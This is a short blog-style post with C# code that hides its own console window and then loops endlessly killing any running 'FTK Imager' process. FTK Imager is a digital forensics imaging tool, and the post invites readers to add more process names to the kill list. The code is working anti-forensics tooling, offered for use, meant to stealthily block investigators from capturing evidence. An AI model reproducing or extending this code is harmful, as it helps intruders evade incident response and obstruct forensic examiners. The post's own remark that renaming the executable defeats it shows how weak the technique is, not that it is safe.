C# – Kill Process (FTK Imager)

First, the current application process is discovered and then the MainWindowHandle (console window) for this process is hidden using ShowWindow(handle, 0).

        static void HideApplication()
        {
            [DllImport("user32.dll")]
            static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
            IntPtr handle = Process.GetCurrentProcess().MainWindowHandle;
            ShowWindow(handle, 0);
        }

The process name “FTK Imager” is used to kill the running process FTK Imager.

Additional processes can be killed by adding to the code below.

        static void KillProcess()
        {
            while (true)
            {
                Process.GetProcesses().ToList().ForEach(process =>
                {
                    if (process.ProcessName.Equals("FTK Imager"))
                    {
                        process.Kill();
                    }
                });
            }
        }

Note that a digital forensics expert can simply change the name of the FTK Imager executable.

GitHub

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisement -spot_img

Latest article